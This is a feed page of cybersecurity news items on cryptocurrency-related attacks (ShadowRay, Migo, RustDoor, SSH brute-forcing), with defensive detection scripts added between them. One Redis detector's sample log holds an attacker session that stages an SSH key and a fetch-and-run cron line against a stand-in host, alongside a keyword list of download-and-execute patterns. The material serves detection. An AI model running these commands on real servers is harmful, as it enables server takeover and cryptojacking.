Cryptocurrency – INDIA NEWS (https://www.indiavpn.org)

Critical Unpatched Ray AI Platform Vulnerability Exploited for Cryptocurrency Mining
https://www.indiavpn.org/2024/03/27/critical-unpatched-ray-ai-platform-vulnerability-exploited-for-cryptocurrency-mining/
Wed, 27 Mar 2024 15:22:11 +0000

Mar 27, 2024 | Newsroom | Vulnerability / Data Security


Cybersecurity researchers are warning that threat actors are actively exploiting a “disputed” and unpatched vulnerability in an open-source artificial intelligence (AI) platform called Anyscale Ray to hijack computing power for illicit cryptocurrency mining.

“This vulnerability allows attackers to take over the companies’ computing power and leak sensitive data,” Oligo Security researchers Avi Lumelsky, Guy Kaplan, and Gal Elbaz said in a Tuesday disclosure.

“This flaw has been under active exploitation for the last seven months, affecting sectors like education, cryptocurrency, biopharma, and more.”

The campaign, ongoing since September 2023, has been codenamed ShadowRay by the Israeli application security firm. It also marks the first time AI workloads have been targeted in the wild through weaknesses in the infrastructure that underpins them.

Ray is an open-source compute framework that allows organizations to build, train, and scale AI and Python workloads. It consists of a core distributed runtime and a set of AI libraries that simplify building an ML platform.


It’s used by some of the biggest companies, including OpenAI, Uber, Spotify, Netflix, LinkedIn, Niantic, and Pinterest, among others.

The security vulnerability in question is CVE-2023-48022 (CVSS score: 9.8), a critical missing authentication bug that allows remote attackers to execute arbitrary code via the job submission API. It was reported by Bishop Fox alongside two other flaws in August 2023.

The cybersecurity company said the lack of authentication controls in two Ray components, Dashboard and Client, could be exploited by “unauthorized actors to freely submit jobs, delete existing jobs, retrieve sensitive information, and achieve remote command execution.”

This makes it possible to obtain operating system access to all nodes in the Ray cluster or attempt to retrieve Ray EC2 instance credentials. Anyscale, in an advisory published in November 2023, said it does not plan to fix the issue at this point in time.

“That Ray does not have authentication built in – is a long-standing design decision based on how Ray’s security boundaries are drawn and consistent with Ray deployment best practices, though we intend to offer authentication in a future version as part of a defense-in-depth strategy,” the company noted.

It also cautions in its documentation that it’s the platform provider’s responsibility to ensure that Ray runs in “sufficiently controlled network environments” and that developers can access Ray Dashboard in a secure fashion.
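Because Anyscale treats network placement as the security control, the check a cluster operator actually needs is "can the dashboard be reached, unauthenticated, from where it should not be?" The script below is an added example written for this article, not code from Ray, Anyscale or Oligo. It assumes, from the Ray Jobs API as generally documented, that the dashboard (port 8265 by default) answers GET /api/version with a JSON body containing a ray_version key; treat the endpoint, port and key names as assumptions to confirm against your own Ray version. Run it from a vantage point outside the trusted network: anything other than auth-required or unreachable means job submission, and therefore code execution on the cluster, is open to that network.

```python
"""Exposure check for a Ray Dashboard / Jobs API endpoint (added example)."""
import json
import urllib.error
import urllib.request

# Assumed from the Ray Jobs API: the dashboard serves GET /api/version and
# returns JSON with a "ray_version" key. A plain 200 here means the job
# submission API is reachable without credentials from this vantage point.
VERSION_PATH = "/api/version"


def classify(status, body):
    """Map an HTTP status and body to one of:
    'exposed'        - unauthenticated Ray Jobs API answered
    'auth-required'  - something in front (proxy, IAP) demanded credentials
    'not-ray'        - reachable, but not a Ray dashboard response
    'unreachable'    - no HTTP answer at all (firewalled, down, wrong host)
    """
    if status is None:
        return "unreachable"
    if status in (401, 403, 407):
        return "auth-required"
    if status == 200:
        try:
            data = json.loads(body)
        except (ValueError, TypeError):
            return "not-ray"
        if isinstance(data, dict) and "ray_version" in data:
            return "exposed"
    return "not-ray"


def probe(base_url, timeout=3.0):
    """Issue the version request and classify the answer."""
    req = urllib.request.Request(
        base_url.rstrip("/") + VERSION_PATH,
        headers={"Accept": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:
        # 4xx/5xx arrive as exceptions; the status code is what matters.
        return classify(e.code, "")
    except (urllib.error.URLError, OSError):
        return classify(None, "")


if __name__ == "__main__":
    import sys

    for target in sys.argv[1:] or ["http://127.0.0.1:8265"]:
        print(f"{target}: {probe(target)}")
```

An "exposed" result from any host that is not an intended Ray client is the finding; the fix is not a Ray setting but a network one (security group, VPC placement, or an authenticating reverse proxy in front of the dashboard).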


Oligo said it observed the shadow vulnerability being exploited to breach hundreds of Ray GPU clusters, potentially enabling the threat actors to get hold of a trove of sensitive credentials and other information from compromised servers.

This includes production database passwords, private SSH keys, access tokens related to OpenAI, HuggingFace, Slack, and Stripe, the ability to poison models, and elevated access to cloud environments from Amazon Web Services, Google Cloud, and Microsoft Azure.

In many cases, the compromised hosts were found running cryptocurrency miners (e.g., XMRig, NBMiner, and Zephyr) as well as reverse shells for persistent remote access.

The unknown attackers behind ShadowRay have also utilized an open-source tool named Interactsh to fly under the radar.

“When attackers get their hands on a Ray production cluster, it is a jackpot,” the researchers said. “Valuable company data plus remote code execution makes it easy to monetize attacks — all while remaining in the shadows, totally undetected (and, with static security tools, undetectable).”

U.S. Sanctions 3 Cryptocurrency Exchanges for Helping Russia Evade Sanctions
https://www.indiavpn.org/2024/03/26/u-s-sanctions-3-cryptocurrency-exchanges-for-helping-russia-evade-sanctions/
Tue, 26 Mar 2024 10:20:51 +0000

Mar 26, 2024 | Newsroom | Money Laundering / Digital Currency


The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned three cryptocurrency exchanges for offering services used to evade economic restrictions imposed on Russia following its invasion of Ukraine in early 2022.

This includes Bitpapa IC FZC LLC, Crypto Explorer DMCC (AWEX), and Obshchestvo S Ogranichennoy Otvetstvennostyu Tsentr Obrabotki Elektronnykh Platezhey (TOEP).

In all, the designations cover thirteen entities and two individuals operating in the Russian financial services and technology sectors.


“Many of the individuals and entities designated today facilitated transactions or offered other services that helped OFAC-designated entities evade sanctions,” the Treasury said, adding the action seeks to “target companies servicing Russia’s core financial infrastructure and curtail Russia’s use of the international financial system to further its war against Ukraine.”

Bitpapa, which offers virtual currency exchange to Russian nationals, has been accused of facilitating transactions worth millions of dollars with sanctioned Russian entities Hydra Market and Garantex.

Crypto Explorer, the Treasury said, offers currency conversion services between virtual currencies, rubles, and UAE dirhams.

“AWEX offers cash services at its offices in Moscow and Dubai and also loads funds onto credit cards associated with OFAC-designated Russian banks such as Sberbank and Alfa-Bank,” it added.

Also sanctioned is another virtual currency exchange run by TOEP that’s alleged to have enabled digital payments in rubles and virtual currencies to sanctioned entities such as Sberbank, Alfa-Bank, and Hydra Market.

The penalty list also features Moscow-based fintech companies such as B-Crypto, Masterchain and Laitkhaus, which have partnered with sanctioned Russian banks to issue, exchange, and transfer cryptocurrency assets.


Pursuant to the sanctions, all properties and interests in the U.S. connected to designated individuals and entities will be frozen. Furthermore, entities at least 50% owned directly or indirectly by one or more blocked persons will also be subject to the blockade.

“Russia is increasingly turning to alternative payment mechanisms to circumvent U.S. sanctions and continue to fund its war against Ukraine,” said Brian E. Nelson, Under Secretary of the Treasury for Terrorism and Financial Intelligence.

“As the Kremlin seeks to leverage entities in the financial technology space, Treasury will continue to expose and disrupt the companies that seek to help sanctioned Russian financial institutions reconnect to the global financial system.”

New Phishing Kit Leverages SMS, Voice Calls to Target Cryptocurrency Users
https://www.indiavpn.org/2024/03/01/new-phishing-kit-leverages-sms-voice-calls-to-target-cryptocurrency-users/
Fri, 01 Mar 2024 13:41:19 +0000

Mar 01, 2024 | Newsroom | Phishing Kit / Cryptocurrency


A novel phishing kit has been observed impersonating the login pages of well-known cryptocurrency services as part of an attack cluster designed to primarily target mobile devices.

“This kit enables attackers to build carbon copies of single sign-on (SSO) pages, then use a combination of email, SMS, and voice phishing to trick the target into sharing usernames, passwords, password reset URLs, and even photo IDs from hundreds of victims, mostly in the United States,” Lookout said in a report.

Targets of the phishing kit include employees of the Federal Communications Commission (FCC), Binance, Coinbase, and cryptocurrency users of various platforms like Binance, Coinbase, Gemini, Kraken, ShakePay, Caleb & Brown, and Trezor. More than 100 victims have been successfully phished to date.

The phishing pages are designed such that the fake login screen is displayed only after the victim completes a CAPTCHA test using hCaptcha, thus preventing automated analysis tools from flagging the sites.

In some cases, these pages are distributed via unsolicited phone calls and text messages by spoofing a company’s customer support team under the pretext of securing their account after a purported hack.


Once the user enters their credentials, they are either asked to provide a two-factor authentication (2FA) code or asked to “wait” while it claims to verify the provided information.

“The attacker likely attempts to log in using these credentials in real time, then redirects the victim to the appropriate page depending on what additional information is requested by the MFA service the attacker is trying to access,” Lookout said.

The phishing kit also attempts to give an illusion of credibility by allowing the operator to customize the phishing page in real-time by providing the last two digits of the victim’s actual phone number and selecting whether the victim should be asked for a six or seven digit token.

The one-time password (OTP) entered by the user is then captured by the threat actor, who uses it to sign in to the desired online service using the provided token. In the next step, the victim can be directed to any page of the attacker’s choosing, including the legitimate Okta login page or a page that displays customized messages.

Lookout said the campaign shares similarities with that of Scattered Spider, specifically in its impersonation of Okta and the use of domains that have been previously identified as affiliated with the group.


“Despite the URLs and spoofed pages looking similar to what Scattered Spider might create, there are significantly different capabilities and C2 infrastructure within the phishing kit,” the company said. “This type of copycatting is common amongst threat actor groups, especially when a series of tactics and procedures have had so much public success.”

It’s currently also not clear if this is the work of a single threat actor or a common tool being used by different groups.

“The combination of high quality phishing URLs, login pages that perfectly match the look and feel of the legitimate sites, a sense of urgency, and consistent connection through SMS and voice calls is what has given the threat actors so much success stealing high quality data,” Lookout noted.


The development comes as Fortra revealed that financial institutions in Canada have been targeted by a new phishing-as-a-service (PhaaS) group called LabHost, which overtook its rival Frappo in popularity in 2023.

LabHost’s phishing attacks are pulled off by means of a real-time campaign management tool named LabRat that makes it possible to stage an adversary-in-the-middle (AiTM) attack and capture credentials and 2FA codes.

Also developed by the threat actor is an SMS spamming tool dubbed LabSend that provides an automated method for sending links to LabHost phishing pages, thereby allowing its customers to mount smishing campaigns at scale.

“LabHost services allow threat actors to target a variety of financial institutions with features ranging from ready-to-use templates, real-time campaign management tools, and SMS lures,” the company said.

New Migo Malware Targeting Redis Servers for Cryptocurrency Mining
https://www.indiavpn.org/2024/02/20/new-migo-malware-targeting-redis-servers-for-cryptocurrency-mining/
Tue, 20 Feb 2024 18:42:28 +0000

Feb 20, 2024 | Newsroom | Server Security / Cryptojacking


A novel malware campaign has been observed targeting Redis servers for initial access with the ultimate goal of mining cryptocurrency on compromised Linux hosts.

“This particular campaign involves the use of a number of novel system weakening techniques against the data store itself,” Cado security researcher Matt Muir said in a technical report.

The cryptojacking attack is facilitated by a malware codenamed Migo, a Golang ELF binary that comes fitted with compile-time obfuscation and the ability to persist on Linux machines.


The cloud security company said it detected the campaign after identifying an “unusual series of commands” against its Redis honeypots, commands engineered to lower the server’s defenses by turning off several Redis configuration options.

It’s suspected that these options are turned off in order to send additional commands to the Redis server from external networks and facilitate future exploitation without attracting much attention.

This step is then followed by threat actors setting up two Redis keys, one pointing to an attacker-controlled SSH key and the other to a cron job that retrieves the malicious primary payload from a file transfer service named Transfer.sh, a technique previously spotted in early 2023.

The shell script to fetch Migo using Transfer.sh is embedded within a Pastebin file that’s, in turn, obtained using a curl or wget command.
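The sequence described above (weaken the configuration, stage an SSH key and a cron line as keys, then get them onto disk) is distinctive enough to detect from Redis's own MONITOR stream. The following is an added example written for this article, not Cado's or Migo's code. It assumes the standard MONITOR line format (`<timestamp> [<db> <ip:port>] "CMD" "arg" ...`) and the classic write path of `CONFIG SET dir` / `CONFIG SET dbfilename` followed by `SAVE`, which the article does not spell out; the option names it treats as "weakening" and the sensitive directory list are likewise assumptions rather than Cado's exact list. The sample lines are constructed.

```python
"""Flag Redis abuse patterns in MONITOR output (added example)."""
import re
import shlex

# Standard MONITOR line: "<unix_ts> [<db> <client_ip:port>] "CMD" "arg" ..."
MONITOR_RE = re.compile(
    r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<cmd>.*)$'
)

# Options an attacker switches off before abusing the store (assumed list).
WEAKENED_OPTIONS = {"protected-mode": "no", "replica-read-only": "no"}
# Directories that turn "CONFIG SET dir" + SAVE into an arbitrary file write.
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/cron.d", "/.ssh")
# Substrings that mark a value as a dropped key or a fetch-and-run cron line.
PAYLOAD_MARKERS = ("ssh-rsa ", "ssh-ed25519 ", "curl ", "wget ", "| sh", "|sh", "bash -c")


def parse_line(line):
    """Split one MONITOR line into timestamp, client IP and argv, or None."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": float(m.group("ts")),
        "client": m.group("client").rsplit(":", 1)[0],  # IPv4 host part
        "args": shlex.split(m.group("cmd")),
    }


def findings_for(args):
    """Return finding tags for a single command's argv."""
    if not args:
        return []
    cmd = args[0].upper()
    tags = []
    if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
        opt, val = args[2].lower(), args[3].lower()
        if WEAKENED_OPTIONS.get(opt) == val:
            tags.append(f"weaken:{opt}")
        if opt == "dir" and any(d in val for d in SENSITIVE_DIRS):
            tags.append("write-primitive:dir")
        if opt == "dbfilename" and (
            val in ("authorized_keys", "root") or val.endswith((".sh", ".py"))
        ):
            tags.append("write-primitive:dbfilename")
    elif cmd in ("SET", "SETEX", "APPEND") and len(args) >= 3:
        if any(marker in " ".join(args[2:]) for marker in PAYLOAD_MARKERS):
            tags.append("payload-staged")
    elif cmd in ("SAVE", "BGSAVE"):
        tags.append("save")
    return tags


def analyze(lines):
    """Aggregate findings per client and return a verdict for each."""
    per_client = {}
    for line in lines:
        ev = parse_line(line)
        if ev:
            per_client.setdefault(ev["client"], set()).update(findings_for(ev["args"]))
    verdicts = {}
    for client, tags in per_client.items():
        weakened = any(t.startswith("weaken:") for t in tags)
        primitive = any(t.startswith("write-primitive") for t in tags)
        staged = "payload-staged" in tags
        if (staged and primitive and "save" in tags) or (weakened and (staged or primitive)):
            verdicts[client] = "abuse"
        elif weakened or staged or primitive:
            verdicts[client] = "suspicious"
        else:
            verdicts[client] = "benign"
    return verdicts


# Constructed sample: one attacker session, one ordinary application client.
SAMPLE_MONITOR = """\
1708444800.100000 [0 203.0.113.7:50122] "CONFIG" "SET" "protected-mode" "no"
1708444800.200000 [0 203.0.113.7:50122] "CONFIG" "SET" "replica-read-only" "no"
1708444800.300000 [0 203.0.113.7:50122] "SET" "sshkey" "ssh-rsa AAAAB3NzaC1yc2EAAAA attacker@example"
1708444800.400000 [0 203.0.113.7:50122] "SET" "cron" "*/1 * * * * curl -fsSL http://example.invalid/p | sh"
1708444800.500000 [0 203.0.113.7:50122] "CONFIG" "SET" "dir" "/var/spool/cron"
1708444800.600000 [0 203.0.113.7:50122] "CONFIG" "SET" "dbfilename" "root"
1708444800.700000 [0 203.0.113.7:50122] "SAVE"
1708444801.000000 [0 10.0.0.12:39210] "GET" "session:42"
1708444801.100000 [0 10.0.0.12:39210] "SET" "session:42" "alice"
"""

if __name__ == "__main__":
    for client, verdict in analyze(SAMPLE_MONITOR.splitlines()).items():
        print(f"{client}: {verdict}")
```

Pipe `redis-cli MONITOR` into `analyze` for a live view; the same logic also applies to a SIEM-collected command log. The real hardening, though, is upstream of detection: bind Redis to private interfaces, keep protected-mode on, set requirepass or ACLs, and rename or disable CONFIG so the write primitive does not exist.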


The Go-based ELF binary, besides incorporating mechanisms to resist reverse engineering, acts as a downloader for an XMRig installer hosted on GitHub. It’s also responsible for performing a series of steps to establish persistence, terminate competing miners, and launch the miner.

On top of that, Migo disables Security-Enhanced Linux (SELinux) and searches for uninstallation scripts for monitoring agents bundled in compute instances from cloud providers such as Qcloud and Alibaba Cloud. It further deploys a modified version (“libsystemd.so”) of a popular user-mode rootkit named libprocesshider to hide processes and on-disk artifacts.
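A libprocesshider-style rootkit works by getting its library into /etc/ld.so.preload and hooking readdir in libc, so every tool that enumerates /proc or a directory the normal way (ps, ls, even Python's os.listdir) simply does not see the miner. Two checks survive that: reading ld.so.preload by its known path, and probing /proc/<pid>/status with stat(), which goes straight to the kernel. The script below is an added example written for this article, not Cado's or Migo's code; the library names it treats as known-bad are taken from the paragraph above, and the SELinux check reads the standard /sys/fs/selinux/enforce file. The pure functions are separated from the live readers so the logic can be tested on constructed input.

```python
"""Spot LD_PRELOAD process hiding and disabled SELinux (added example)."""
import os

PRELOAD_FILE = "/etc/ld.so.preload"
SELINUX_ENFORCE = "/sys/fs/selinux/enforce"

# libprocesshider usually ships as libprocesshider.so; Migo's variant was
# renamed libsystemd.so. On a server, *anything* in ld.so.preload is worth a
# look, so unknown entries are still reported, just with a different tag.
KNOWN_BAD_NAMES = ("libprocesshider", "libsystemd.so")


def parse_preload(text):
    """Return the library paths listed in an ld.so.preload body (comments dropped)."""
    libs = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            libs.extend(line.split())
    return libs


def classify_preload(libs):
    """Tag each preloaded library as known-bad or merely unexpected."""
    tags = []
    for lib in libs:
        base = os.path.basename(lib)
        if any(name in base for name in KNOWN_BAD_NAMES):
            tags.append(f"known-bad:{base}")
        else:
            tags.append(f"unexpected-preload:{base}")
    return tags


def hidden_pids(listed, probed):
    """PIDs that exist (found via stat) but are missing from readdir output."""
    return sorted(set(probed) - set(listed))


def selinux_mode(enforce_text):
    """Interpret /sys/fs/selinux/enforce: '1' enforcing, '0' permissive."""
    value = enforce_text.strip()
    if value == "1":
        return "enforcing"
    if value == "0":
        return "permissive"
    return "unknown"


def live_listed_pids():
    """What a readdir-based tool sees (this is the call a rootkit hooks)."""
    return [int(d) for d in os.listdir("/proc") if d.isdigit()]


def live_probed_pids(pid_max=None):
    """Brute-force /proc/<pid>/status with stat(); slow but not hookable via readdir."""
    if pid_max is None:
        with open("/proc/sys/kernel/pid_max") as f:
            pid_max = int(f.read())
    found = []
    for pid in range(1, pid_max + 1):
        try:
            os.stat(f"/proc/{pid}/status")
            found.append(pid)
        except FileNotFoundError:
            continue
    return found


def read_or_empty(path):
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        return ""


if __name__ == "__main__":
    print("ld.so.preload:", classify_preload(parse_preload(read_or_empty(PRELOAD_FILE))) or "clean")
    print("SELinux:", selinux_mode(read_or_empty(SELINUX_ENFORCE)))
    hidden = hidden_pids(live_listed_pids(), live_probed_pids())
    print("hidden PIDs:", hidden or "none")
```

On a 64-bit host pid_max can be in the millions, so the probe takes a few seconds; that is acceptable for an incident check. Any PID it reports should be inspected via /proc/<pid>/exe and /proc/<pid>/maps directly, by path, since the same hook hides the on-disk artifacts from directory listings.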

It’s worth pointing out that these actions overlap with tactics adopted by known cryptojacking groups like TeamTNT, WatchDog, Rocke, and threat actors associated with the SkidMap malware.


“Interestingly, Migo appears to recursively iterate through files and directories under /etc,” Muir noted. “The malware will simply read files in these locations and not do anything with the contents.”

“One theory is this could be a (weak) attempt to confuse sandbox and dynamic analysis solutions by performing a large number of benign actions, resulting in a non-malicious classification.”

Another hypothesis is that the malware is looking for an artifact that’s specific to a target environment, although Cado said it found no evidence to support this line of reasoning.

“Migo demonstrates that cloud-focused attackers are continuing to refine their techniques and improve their ability to exploit web-facing services,” Muir said.

“Although libprocesshider is frequently used by cryptojacking campaigns, this particular variant includes the ability to hide on-disk artifacts in addition to the malicious processes themselves.”

RustDoor macOS Backdoor Targets Cryptocurrency Firms with Fake Job Offers
https://www.indiavpn.org/2024/02/16/rustdoor-macos-backdoor-targets-cryptocurrency-firms-with-fake-job-offers/
Fri, 16 Feb 2024 16:03:44 +0000

Feb 16, 2024 | Newsroom | Endpoint Security / Cryptocurrency


Several companies operating in the cryptocurrency sector are the target of a newly discovered Apple macOS backdoor codenamed RustDoor.

RustDoor was first documented by Bitdefender last week, describing it as a Rust-based malware capable of harvesting and uploading files, as well as gathering information about the infected machines. It’s distributed by masquerading itself as a Visual Studio update.

While prior evidence uncovered at least three different variants of the backdoor, the exact initial propagation mechanism remained unknown.

That said, the Romanian cybersecurity firm subsequently told The Hacker News that the malware was used as part of a targeted attack rather than a shotgun distribution campaign, noting that it found additional artifacts that are responsible for downloading and executing RustDoor.


“Some of these first stage downloaders claim to be PDF files with job offerings, but in reality, are scripts that download and execute the malware while also downloading and opening an innocuous PDF file that bills itself as a confidentiality agreement,” Bogdan Botezatu, director of threat research and reporting at Bitdefender, said.

Since then, three more malicious samples that act as first-stage payloads have come to light, each of them purporting to be a job offering. These ZIP archives predate the earlier RustDoor binaries by nearly a month.

The new component of the attack chain – i.e., the archive files (“Jobinfo.app.zip” or “Jobinfo.zip”) – contains a basic shell script that’s responsible for fetching the implant from a website named turkishfurniture[.]blog. It’s also engineered to preview a harmless decoy PDF file (“job.pdf”) hosted on the same site as a distraction.


Bitdefender said it also detected four new Golang-based binaries that communicate with an actor-controlled domain (“sarkerrentacars[.]com”), whose purpose is to “collect information about the victim’s machine and its network connections using the system_profiler and networksetup utilities, which are part of the macOS operating system.”

In addition, the binaries are capable of extracting details about the disk via “diskutil list” as well as retrieving a wide list of kernel parameters and configuration values using the “sysctl -a” command.

A closer investigation of the command-and-control (C2) infrastructure has also revealed a leaky endpoint (“/client/bots”) that makes it possible to glean details about the currently infected victims, including the timestamps when the infected host was registered and the last activity was observed.


The development comes as South Korea’s National Intelligence Service (NIS) revealed that an IT organization affiliated with the Workers’ Party of North Korea’s Office No. 39 is generating illicit revenue by selling thousands of malware-laced gambling websites to other cybercriminals for stealing sensitive data from unsuspecting gamblers.

The company behind the malware-as-a-service (MaaS) scheme is Gyeongheung (also spelled Gyonghung), a 15-member entity based in Dandong that has allegedly received $5,000 from an unidentified South Korean criminal organization in exchange for creating a single website and $3,000 per month for maintaining the website, Yonhap News Agency reported.

DPRK Hackers Stole $600 Million in Cryptocurrency in 2023
https://www.indiavpn.org/2024/01/08/dprk-hackers-stole-600-million-in-cryptocurrency-in-2023/
Mon, 08 Jan 2024 06:28:14 +0000

Jan 08, 2024 | Newsroom | Cryptocurrency / Financial Crime


Threat actors affiliated with the Democratic People’s Republic of Korea (also known as North Korea) have plundered at least $600 million in cryptocurrency in 2023.

The DPRK “was responsible for almost a third of all funds stolen in crypto attacks last year, despite a 30% reduction from the USD 850 million haul in 2022,” blockchain analytics firm TRM Labs said last week.

“Hacks perpetrated by the DPRK were on average ten times as damaging as those not linked to North Korea.”


There are indications that additional breaches targeting the crypto sector towards the end of 2023 could push this figure higher to around $700 million.

The targeting of cryptocurrency companies is not new for North Korean state-sponsored actors, who have stolen about $3 billion since 2017.

These financially motivated attacks are seen as a crucial revenue-generation mechanism for the sanctions-hit nation, funding its weapons of mass destruction (WMD) and ballistic missile programs.


The intrusions leverage social engineering to lure targets and typically aim to compromise private keys and seed phrases – which are used to safeguard digital wallets – and then use them to gain unauthorized access to the victims’ assets and transfer them to wallets under the threat actor’s control.

“They are then swapped mostly for USDT or Tron and converted to hard currency using high-volume OTC brokers,” TRM Labs said.


The company further noted that DPRK hackers continued to explore other money laundering tools after the U.S. Treasury Department sanctioned a crypto mixer service known as Sinbad for processing a chunk of their proceeds, indicating constant evolution despite law enforcement pressure.

“With nearly USD 1.5 billion stolen in the past two years alone, North Korea’s hacking prowess demands continuous vigilance and innovation from business and governments,” TRM Labs said.

Poorly Secured Linux SSH Servers Under Attack for Cryptocurrency Mining
https://www.indiavpn.org/2023/12/27/poorly-secured-linux-ssh-servers-under-attack-for-cryptocurrency-mining/
Wed, 27 Dec 2023 06:58:43 +0000

Dec 27, 2023 | Newsroom | Malware / Server Security

Poorly secured Linux SSH servers are being targeted by bad actors to install port scanners and dictionary attack tools with the goal of targeting other vulnerable servers and co-opting them into a network to carry out cryptocurrency mining and distributed denial-of-service (DDoS) attacks.

“Threat actors can also choose to install only scanners and sell the breached IP and account credentials on the dark web,” the AhnLab Security Emergency Response Center (ASEC) said in a report on Tuesday.

In these attacks, adversaries try to guess a server’s SSH credentials by running through a list of commonly used username and password combinations, a technique known as a dictionary attack.

If a guess succeeds, the threat actor deploys additional malware, including scanners that look for other susceptible systems on the internet.

Specifically, the scanner is designed to look for systems where port 22 — which is associated with the SSH service — is active and then repeats the process of staging a dictionary attack in order to install malware, effectively propagating the infection.


Another notable aspect of the attack is the execution of commands such as “grep -c ^processor /proc/cpuinfo” to determine the number of CPU cores.

“These tools are believed to have been created by PRG old Team, and each threat actor modifies them slightly before using them in attacks,” ASEC said, adding there is evidence of such malicious software being used as early as 2021.

To mitigate the risks associated with these attacks, it’s recommended that users rely on passwords that are hard to guess, periodically rotate them, and keep their systems up-to-date.
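Two things a practitioner will want beyond the advice above: a way to see a dictionary attack (and, worse, a successful one) in sshd's log, and a check that the server is not still accepting passwords at all, since disabling password authentication in favor of keys removes this attack surface entirely. The script below is an added example written for this article, not ASEC's code. It parses the standard OpenSSH "Failed password" / "Accepted password|publickey" syslog lines and audits sshd_config for the settings that make guessing possible; the log lines and config text are constructed, and the failure threshold is an arbitrary choice.

```python
"""Dictionary-attack detection over sshd logs plus an sshd_config audit (added example)."""
import re
from collections import defaultdict

# Standard OpenSSH syslog formats; "invalid user" appears for unknown accounts.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>password|publickey) for (?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

# sshd_config values that keep a server guessable (first match wins in sshd,
# but any occurrence is worth reporting).
WEAK_SETTINGS = {
    "passwordauthentication": "yes",
    "permitrootlogin": "yes",
    "permitemptypasswords": "yes",
}


def analyze_auth_log(lines, threshold=5):
    """Return {ip: report} for sources with >= threshold failed password logins.

    A subsequent 'Accepted password' from the same source upgrades the verdict
    to likely-compromised: the dictionary attack worked.
    """
    failures = defaultdict(list)   # ip -> usernames tried
    accepted = defaultdict(list)   # ip -> (method, user) that got in
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            failures[m.group("ip")].append(m.group("user"))
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            accepted[m.group("ip")].append((m.group("method"), m.group("user")))

    report = {}
    for ip, users in failures.items():
        if len(users) < threshold:
            continue
        verdict = "dictionary-attack"
        if any(method == "password" for method, _ in accepted.get(ip, [])):
            verdict = "likely-compromised"
        report[ip] = {
            "verdict": verdict,
            "attempts": len(users),
            "distinct_users": len(set(users)),
            "logins": accepted.get(ip, []),
        }
    return report


def audit_sshd_config(text):
    """Return the weak 'Key value' lines found in an sshd_config body."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        key, val = parts[0].lower(), parts[1].strip().lower()
        if WEAK_SETTINGS.get(key) == val:
            findings.append(f"{parts[0]} {parts[1].strip()}")
    return findings


# Constructed sample log: one guessing source that eventually gets root.
SAMPLE_AUTH_LOG = """\
Dec 26 03:14:07 web1 sshd[2193]: Failed password for invalid user admin from 198.51.100.23 port 51022 ssh2
Dec 26 03:14:09 web1 sshd[2193]: Failed password for invalid user test from 198.51.100.23 port 51030 ssh2
Dec 26 03:14:11 web1 sshd[2195]: Failed password for root from 198.51.100.23 port 51036 ssh2
Dec 26 03:14:13 web1 sshd[2195]: Failed password for root from 198.51.100.23 port 51040 ssh2
Dec 26 03:14:15 web1 sshd[2197]: Failed password for ubuntu from 198.51.100.23 port 51042 ssh2
Dec 26 03:14:20 web1 sshd[2210]: Accepted password for root from 198.51.100.23 port 51044 ssh2
Dec 26 03:15:01 web1 sshd[2230]: Accepted publickey for deploy from 10.0.0.5 port 40012 ssh2: ED25519 SHA256:constructed
Dec 26 03:15:30 web1 sshd[2240]: Failed password for alice from 10.0.0.9 port 40100 ssh2
"""

# Constructed sshd_config fragment: one weak line, one acceptable, one commented out.
SAMPLE_SSHD_CONFIG = """\
PasswordAuthentication yes
PermitRootLogin prohibit-password
#PermitEmptyPasswords yes
"""

if __name__ == "__main__":
    for ip, info in analyze_auth_log(SAMPLE_AUTH_LOG.splitlines()).items():
        print(ip, info)
    print("weak sshd_config settings:", audit_sshd_config(SAMPLE_SSHD_CONFIG))
```

Feed `/var/log/auth.log` (or `journalctl -u ssh`) into `analyze_auth_log` and `/etc/ssh/sshd_config` into `audit_sshd_config`. A "likely-compromised" verdict means the host should be treated as owned, not just blocked; at that point the scanner and miner described above are probably already running.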

The findings come as Kaspersky revealed that a novel multi-platform threat called NKAbuse is leveraging a decentralized, peer-to-peer network connectivity protocol known as NKN (short for New Kind of Network) as a communications channel for DDoS attacks.
